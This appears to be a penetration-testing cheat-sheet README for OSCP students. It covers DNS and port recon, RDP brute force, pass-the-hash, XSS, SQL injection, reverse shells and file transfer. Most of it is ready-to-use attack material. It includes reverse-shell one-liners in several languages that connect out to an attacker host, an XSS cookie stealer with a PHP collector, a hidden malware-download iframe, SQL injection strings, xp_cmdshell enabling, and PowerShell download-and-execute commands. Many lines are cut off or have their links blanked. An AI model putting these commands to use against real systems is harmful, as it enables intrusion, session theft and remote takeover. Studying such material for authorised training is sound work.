This repo has a collection of snippets of codes and commands to help our lives!

The main
purpose is not be a crutch, this is a way to do not waste our precious time! This repo also helps
who trying to get OSCP. You'll find many ways to do something without Metasploit Framework.

Ninja Tricks

Recon
DNS
SPF
Nmap
NetCat
SNMP
Mysql
MS SQL
Web Enumeration
Exploitation
System Network
RDP
Pass The Hash
Windows-Shell
Web Application
Web Remote Code Execution
LFI
encode
 XSS
SQLi
sqlmap
Bare Hands
Jekins
Post-exploitation
Reverse Shell
PHP Reverse Shell
Perl Reverse Shell
python Reverse Shell
Ruby Reverse Shell
bash Reverse Shell
powershell Reverse Sheel
Java Reverse Sheel
Xterm Reverse Sheel
Linux
Linux Privilege Escalation
Data Haversting and Enumeration
Linux Pivot
Sshutle
VPNPivot
SSH Tunneling
Linux Backdoring
Windows
Windows Enumeration
Windows Privilege Escalation
Hashdump
Transferring Files Without Metasploit
Backdoring
Windows Pivot
Openssh for Tunneling
Plink
Resources
HTTP/HTTPS Servers
Wordlist
seclist
 cotse
PacketStorm
Default Passwords
Default Passoword
Router Password
Leak
Pastebin
Tables
Contribution

Recon

DNS

Nslookup
Resolve a given hostname to the corresponding IP.

nslookup [Link]

Reverse DNS lookup

nslookup -type=PTR IP_address

MX(Mail Exchange) lookup

nslookup -type=MX domain

Zone Transfer

Using nslookup Command

nslookup
server [Link]
ls -d [Link]
Using HOST Command

host -t ns(Name Server) < domain >

host -t ns [Link]

after that test nameservers

host -l < domain > < nameserver >

host -l [Link] [Link]

Nmap Dns Enumaration

nmap -F --dns-server <dns server ip> <target ip range>

Auto tools

DNSenum

dnsenum [Link]

dnsenum --target_domain_subs.txt -v -f [Link] -u a -r [Link]

DNSmap

[Link]

dnsmap [Link] -w <Wordlst [Link]>

Brute Force, the file is saved in /tmp

dnsmap [Link] -r

DNSRecon DNS Brute Force

 dnsrecon -d TARGET -D /usr/share/wordlists/[Link] -t std --xml [Link]

[Link]

fierce -dns [Link]

HostMap

[Link] -only-passive -t <IP>

We can use -with-zonetransfer or -bruteforce-level

SPF Recon

Dig SPF txt

dig txt [Link]

Dmarc

dig TXT _dmarc.[Link]

Online Tools

[Link]
[Link]
[Link]
[Link]

Nmap

Set the ip address as a varible

export ip=[Link] export netw=[Link]/24

Detecting Live Hosts
Only Ip's

nmap -sn -n $netw | grep for | cut -d" " -f5

Stealth Scan

nmap -sS $ip

Only Open Ports and Banner Grab

nmap -n -Pn -sS $ip --open -sV

Stealth scan using FIN Scan

map -sF $ip

Agressive scan
Without Ping scan, no dns resolution, show only open ports all and test All TCP Ports

nmap -n -Pn -sS -A $ip --open -p-

Nmap verbose scan, runs syn stealth, T4 timing, OS and service version info, traceroute and
scripts against services

nmap –v –sS –A –T4 $ip

OS FigerPrint

nmap -O $ip

Quick Scan

nmap -T4 -F $netw

Quick Scan Plus

nmap -sV -T4 -O -F --version-light $netw

output to a file

nmap -oN nameFile -p 1-65535 -sV -sS -A -T4 $ip

output to a file Plus

nmap -oA nameFile -p 1-65535 -sV -sS -A -T4 $netw

Search NMAP scripts

ls /usr/share/nmap/scripts/ | grep ftp

Nmap Discovery

NetCat

Port Scanner
One port

nc -nvz [Link] 80

Port Range

nc -vnz [Link] 0-1000

Send files
Server
 nc -lvp 1234 > file_name_to_save

Client

nc -vn [Link] 1234 < file_to_send

Executing remote script

Server

nc -lvp 1234 -e [Link] <IP>

Client

nc -vn [Link] 1234

Chat with encryption

Server

ncat -nlvp 8000 --ssl

Client

ncat -nv [Link] 8000

Banner Grabbing
Request

nc target port
HTTP_Verb path http/version
Host: url

Response
 nc [Link] 80
HEAD / HTTP/1.0
Host: [Link]

If this site uses https you need to use openssl

openssl s_client -quiet [Link]

SNMP

Fixing SNMP output

apt-get install snmp-mibs-downloader download-mibs

echo "" > /etc/snmp/[Link]

OneSixtyone
onesixtyone -c COMMUNITY_FILE -i Target_ip

onesixtyone -c [Link] -i Found_ips.txt

snmpwalk
Walking MIB's

snmpwalk -c COMMUNITY -v VERSION target_ip

snmpwalk -c public -v1 [Link]

specific MIB node snmpwalk -c community -v version Target IP MIB Node Example: USER
ACCOUNTS = [Link].[Link].2.25

snmpwalk -c public -v1 [Link] [Link].[Link].2.25

snmp-check
snmp-check -t target_IP | snmp-check -t TARGET -c COMMUNITY

snmp-check -t [Link]

snmp-check -t [Link] -c public

Automate the username enumeration process for SNMPv3

apt-get install snmp snmp-mibs-downloader

wget [Link]

NMAP SNMPv3 Enumeration

nmap -sV -p 161 --script=snmp-info [Link]/24

Default Credentials

/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

MYSQL

Try remote default Root access

Mysql Open to wild

mysql -h Target_ip -u root -p

MSSQL
MSQL Information Gathering

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-

Web Enumeration

Dirsearch

dirsearch -u [Link] -e sh,txt,htm,php,cgi,html,pl,bak,old

dirsearch -u [Link] -e sh,txt,htm,php,cgi,html,pl,bak,old -w path/to/wordlist

dirsearch -u [Link] -e .

dirb

dirb [Link] /path/to/wordlist

dirb [Link] /path/to/wordlist -X .sh,.txt,.htm,.php,.cgi,.html,.p

Gobuster

gobuster -u [Link] -w /usr/share/wordlists/dirb/[Link]

Exploitation

System Network

RDP
xfreerdp

Simple User Enumeration for Windows Target (kerberos based)

xfreerdp /v:<target_ip> -sec-nla /u:""

xfreerdp /v:[Link] -sec-nla /u:""

login
xfreerdp /u: /g: /p: /v:<target_ip>

xfreerdp /u:administrator /g:grandbussiness /p:bla /v:[Link]

Wordlist based bruteforce

NCRACK
ncrack -vv --user/-U <username/username_wordlist> --pass/-P <password/password_wordlist>
<target_ip>:3389

ncrack -vv --user user -P [Link] [Link]:3389

Crowbar
crowbar -b rdp <-u/-U user/user_wordlist> -c/-C <password/password_wordlist> -s
<target_ip>/32 -v

crowbar -b rdp -u user -C password_wordlist -s [Link]/32 -v

Pass the hash

Smb pass the hash

Tool:

pth-toolkit
Listing shared folders
sudo pth-smbclient --user= --pw-nt-hash -m smb3 -L <target_ip> \\<target_ip>\

sudo pth-smbclient --user=user --pw-nt-hash -m smb3 -L [Link] \\\\192.168.0

Interactive smb shell

sudo pth-smbclient --user= --pw-nt-hash -m smb3 \\<target_ip>\shared_folder

sudo pth-smbclient --user=user --pw-nt-hash -m smb3 \\\\[Link]\\folder ljahdçj

Web Application

Web Remote code

LFI (Local File Inclusion)

Situation

[Link]

How to Test

[Link]

[Link]

[Link]

LFI Payloads

Payload All the Things

Seclist LFI Intruder
encode

XSS

Reflected

Simple test

This is a simple test to see what happens, this is not a prove that the field is vuln to xss

<plaintext>

Simple XSS test

<script>alert('Found')</script>

"><script>alert(Found)</script>">

<script>alert([Link](88,83,83))</script>

Bypass filter of tag script

" onload="alert([Link](88,83,83))

" onload="alert('XSS')

bla is not a valid image, so this cause an error

<img src='bla' onerror=alert("XSS")>

Persistent

>[Link]="<style>body{visibility:hidden;}</style><div style=visibili

PHP collector
> [Link] chmod 777 [Link]

edit a php page like [Link] as follow:

<?php
$cookie=GET['cookie'];
$useragent=$_SERVER['HTTP_USER_AGENT'];
$file=fopen('[Link]', 'a');
fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n");
fclose($file);
?>

Script to put in page:

<scritp>new Image().src="[Link]

Malware Donwloader via XSS

<iframe src="[Link] height="0" width="0"></iframe>

How to play Mario with XSS

<iframe
src="[Link]
width="100%"
height="600"
></iframe>

<input onfocus="[Link]=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2

XSS payloads

Payload All The Things

Seclist XSS

SQLI
Sql Injection
Sqlmap

GET

Error-Based

Simple test

Adding a simpe quote '

Example:

[Link]

List databases

./[Link] -u [Link] --dbs

List tables

./[Link] -u [Link] -D database_name --tables

List columns

./[Link] -u [Link] -D database_name -T table_name --columns

Dump all

./[Link] -u [Link] -D database_name -T table_name --dump-al

Set Cookie

./[Link] -u [Link] --cookie "Cookie: OV1364928461=6kb5jvu7f

Checking Privileges

./[Link] -u [Link] --privileges | grep FILE

Reading file

./[Link] -u <URL> --file-read=<file to read>

./[Link] -u [Link] --file-read=/etc/passwd

Writing file

./[Link] -u <url> --file-write=<file> --file-dest=<path>

./[Link] -u [Link] --file-write=[Link] --file-dest=/var/

POST

./[Link] -u <POST-URL> --data="<POST-paramters> "

./[Link] -u [Link] --data "uname=teste&passwd=&submit=Submi

You can also use a file like with the post request:

./[Link] -r [Link] -p uname

Bare Hands

GET

Error-Based

Simple test

Adding a simpe quote '

Example:

[Link]
Fuzzing

Sorting columns to find maximum column

[Link] order by 1

[Link] order by 2

[Link] order by 3

(until it stop returning errors)

Finding what column is injectable

mysql

[Link] union select 1, 2, 3

(using the same amount of columns you got on the previous step)

postgresql

[Link] union select NULL, NULL, NULL

(using the same amount of columns you got on the previous step)

one of the columns will be printed with the respective number

Finding version

mysql

[Link] union select 1, 2, version()

postgres

[Link] union select NULL, NULL, version()

Finding database name

mysql

[Link] union select 1,2, database()

postgres
[Link] union select NULL,NULL, database()

Finding usernames logged in

mysql

[Link] union select 1, 2, current_user()

Finding databases

mysql

[Link] union select 1, 2, schema_name from

information_schema.schemata

postgres

[Link] union select 1, 2, datname from pg_database

Finding table names from a database

mysql

[Link] union select 1, 2, table_name from information_schema.

postgres

[Link] union select 1, 2, tablename from pg_tables where table

Finding column names from a table

mysql

[Link] union select 1, 2, column_name from information_schema.

postgres

[Link] union select 1, 2, column_name from information_schema.

Concatenate
Example:

[Link] union select 1, 2, login from users;

[Link] union select 1, 2, password from users;

in one query

[Link] union select 1, 2, concat(login,':',password) from

users; mysql [Link] union select 1, 2, login||':'||password
from users; postgres

Error Based SQLI (USUALLY MS-SQL)

Current user

[Link] or 1 in (SELECT TOP 1 CAST(user_name() as

varchar(4096)))--

DBMS version

[Link] or 1 in (SELECT TOP 1 CAST(@@version as

varchar(4096)))--

Database name

[Link] or db_name(0)=0 --

Tables from a database

[Link] or 1 in (SELECT TOP 1 CAST(name as varchar(4096))

FROM dbname..sysobjects where xtype='U')--

[Link] or 1 in (SELECT TOP 1 CAST(name as varchar(4096))

FROM dbname..sysobjects where xtype='U' AND name NOT IN
('previouslyFoundTable',...))--

Columns within a table

[Link] or 1 in (SELECT TOP 1 CAST(dbname..[Link] as

varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE
dbname..[Link]=dbname..[Link] AND dbname..[Link] =
'tablename')--
 remember to change dbname and tablename accordingly with the given situation after
each iteration a new column name will be found, make sure add it to ** previously found
column name ** separated by comma as on the next sample

[Link] or 1 in (SELECT TOP 1 CAST(dbname..[Link] as

varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE
dbname..[Link]=dbname..[Link] AND dbname..[Link] =
'tablename' AND dbname..[Link] NOT IN('previously found column name',
...))--

Actual data

[Link] or 1 in (SELECT TOP 1 CAST(columnName as

varchar(4096)) FROM tablename)--

after each iteration a new column name will be found, make sure add it to ** previously
found column name ** separated by comma as on the next sample

[Link] or 1 in (SELECT TOP 1 CAST(columnName as

varchar(4096)) FROM tablename AND name NOT IN('previously found row data'))--

Shell commands

EXEC master..xp_cmdshell <command>

you need yo be 'sa' user

Enabling shell commands

EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_congigure

'xp_shell', 1; RECONFIGURE;

Jenkins

Post Exploitation

Reverse Shell

PHP Reverse Shell

 php -r '$sock=fsockopen("[Link]",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Tiny Reverse Shell

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/[Link]/1337 0>&1'");

Perl Reverse Shell

perl -e 'use Socket;$i="[Link]";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobynam

Python Reverse Shell

python -c 'import socket,subprocess,os;s=[Link](socket.AF_INET,socket.SOCK_ST

Ruby Reverse Shell

ruby -rsocket -e'f=[Link]("[Link]",1234).to_i;exec sprintf("/bin/sh -i <&%

Bash Reverse Shell

bash -i >& /dev/tcp/[Link]/8080 0>&1

Powershell Reverse Shell

Create a simple powershell script called reverse.ps1:

function reverse_powershell {
$client = New-Object [Link]("[Link]",80);$stream =
}

powershell -ExecutionPolicy bypass -command "Import-Module reverse.ps1; reverse_powe

Java Reverse Shell

r = [Link]()
p = [Link](["/bin/bash","-c","exec 5<>/dev/tcp/[Link]/2002;cat <&5 | while read li
[Link]()

Xterm Reverse Shell

One of the simplest forms of reverse shell is an xterm session. The following command should
be run on the server. It will try to connect back to you ([Link]) on TCP port 6001.

xterm -display [Link]:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to
do this is with Xnest (to be run on your system):

Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):

xhost +targetip

Linux

Windows

Transferring Files Without Metasploit

Powershell

Download files with powershell

powershell -c "Invoke-WebRequest -uri '[Link] -OutFil

 powershell iex (New-Object [Link]).DownloadString('[Link]

powershell "(New-Object [Link]).Downloadfile('[Link]

Creating a server with python3

python -m [Link]

Creating a server with python2

python -m SimpleHTTPServer 80

FTP

You need to create a FTP server

Server Linux Allow anonymous

python -m pyftpdlib -p 21 -u anonymous -P anonymous

Windows Client

ftp
open target_ip port
open [Link] 21

we can simply run ftp -s:ftp_commands.txt and we can download a file with no user interaction.

like this:

C:\Users\kitsunesec\Desktop>echo open [Link]>ftp_commands.txt

C:\Users\kitsunesec\Desktop>echo anonymous>>ftp_commands.txt
C:\Users\kitsunesec\Desktop>echo whatever>>ftp_commands.txt
C:\Users\kitsunesec\Desktop>ftp -s:ftp_commands.txt

Apache Server

server Put your files into /var/www/html

 cp [Link] /var/www/html
systemctl start apache2

client

Get via web browser, wget or powershell...

Windows Pivoting

Openssh for Tunneling

Once you got SYSTEM on the target machine. download: openssh_for_windows

powershell -command "Expand-Archive 'C:\<path-to-zipped-openssh>\[Link]' c:\<pa

Then install it:

powershell -ExecutionPolicy Bypass -File c:\<path-to-unzipped-openssh-folder>\instal

Now if you need, just adjust the firewall rules to your needs:

powershell -Command "New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH Server (ss

Start the sshd service:

net start sshd

After these steps a regular ssh tunnel would sufice:

From your linux machine:

$ ssh -ACv -D <tunnel_port> <windows-user>@<windows-ip>

done you have now a socks to tunnel through!!

Resources
HTTP/HTTPS Servers

HTTPS using Python

Create the Certificate:

openssl req -new -x509 -keyout [Link] -out [Link] -days 365 -nodes

Start the HTTPS Server

import BaseHTTPServer, SimpleHTTPServer

import ssl

httpd = [Link](('[Link]', 443), [Link]

[Link] = ssl.wrap_socket ([Link], certfile='./[Link]', server_side=T
httpd.serve_forever()

Wordlists

Wordlists
PacketStorm
SecList
cotse
Default Password
DefaultPassword
RouterPassword
Leak
Pastebin
Tables
RainbowCrack

Contribution

HOW TO